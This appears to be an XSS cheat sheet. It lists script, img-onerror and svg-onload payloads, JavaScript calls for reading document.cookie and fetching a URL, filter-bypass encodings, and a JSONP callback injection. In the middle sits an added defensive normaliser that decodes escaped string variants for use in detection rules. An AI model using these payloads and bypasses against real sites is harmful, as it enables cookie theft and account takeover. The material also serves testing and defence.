Templates
<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>
JS functions
btoa() // encodes a string to base64
atob() // decodes a base64-encoded string
document.getElementById(id)
document.getElementsByClassName(names)
document.getElementsByName(name) //for inputs
window.location.replace('<url>')
window.location.href='<url>'
document.cookie
document['cookie']
fetch("<url>")
'hello'.concat('','world')
'hello'.slice(0,2)
`cookie : ${document.cookie}`
Filter bypass
<iMg>
<[%00]img> // [%00] stands for a null byte
\u0061lert(1)
alert`1`
"hack"
'hack'
`hack`
"\h\a\c\k" // identity escapes; does not work for every character
"\x68\x61\x63\x6b" // hex escapes
"\u0068\u0061\u0063\u006b" // unicode escapes
"\150\141\143\153" // octal escapes (char code base 8)
/hack/
/hack/.source
String.fromCharCode(104,97,99,107) // char codes base 10
atob("aGFjaw==")
<script
>alert(1)</script> // note the newline between the tag name and ">"
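The quoted-literal forms above are all the same string under different encodings. The following is an added example, not from the original cheat sheet, of a normaliser a defender can drop into a detection rule or test suite so that a signature for "hack" also matches its escaped, fromCharCode and atob variants. Function names such as normalizeJsString are my own, and the base64 branch assumes Node (Buffer); in a browser atob() does the same job.

```javascript
// Resolve the backslash escapes that a JS string literal accepts.
function decodeEscapes(body) {
  const simple = { n: '\n', t: '\t', r: '\r', b: '\b', f: '\f', v: '\v' };
  return body.replace(
    /\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[0-7]{1,3}|.)/g,
    (_, esc) => {
      if (esc[0] === 'x' || esc[0] === 'u') {
        return String.fromCharCode(parseInt(esc.slice(1), 16)); // \xHH, \uHHHH
      }
      if (/^[0-7]{1,3}$/.test(esc)) {
        return String.fromCharCode(parseInt(esc, 8)); // legacy octal \NNN
      }
      return simple[esc] || esc; // \n etc., otherwise identity escape: \h -> h
    }
  );
}

// Reduce one expression to the plain string it yields, or null if not a handled form.
function normalizeJsString(expr) {
  const s = expr.trim();
  let m;
  if ((m = s.match(/^(["'`])([\s\S]*)\1$/))) return decodeEscapes(m[2]); // quoted literal
  if ((m = s.match(/^\/(.*)\/(?:\.source)?$/))) return m[1]; // /hack/ or /hack/.source
  if ((m = s.match(/^String\.fromCharCode\(([\d\s,]*)\)$/))) {
    return String.fromCharCode(...m[1].split(',').map((n) => parseInt(n, 10)));
  }
  if ((m = s.match(/^atob\(\s*(["'`])([A-Za-z0-9+/=]*)\1\s*\)$/))) {
    return Buffer.from(m[2], 'base64').toString('latin1'); // Node; atob() in browsers
  }
  return null;
}

// Constructed sample inputs: the variants of "hack" listed on this page.
// String.raw keeps the backslashes exactly as they appear in the page text.
const SAMPLES = [
  '"hack"', "'hack'", '`hack`',
  String.raw`"\h\a\c\k"`,
  String.raw`"\x68\x61\x63\x6b"`,
  String.raw`"\u0068\u0061\u0063\u006b"`,
  String.raw`"\150\141\143\153"`,
  '/hack/', '/hack/.source',
  'String.fromCharCode(104,97,99,107)',
  'atob("aGFjaw==")',
];

// Distinct plain values behind a list of literals: one entry means every
// variant is the same string under a different coat.
function distinctPlainValues(literals) {
  return [...new Set(literals.map(normalizeJsString))];
}
```

Running distinctPlainValues(SAMPLES) returns ['hack'], which is the value a detection rule should be matched against rather than the raw literal.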
Example
JSONP
http://lun.org/page?p=<script src="https://content-customsearch.googleapis.com/customsearch/v1?q=hello&callback=<javascript>"></script>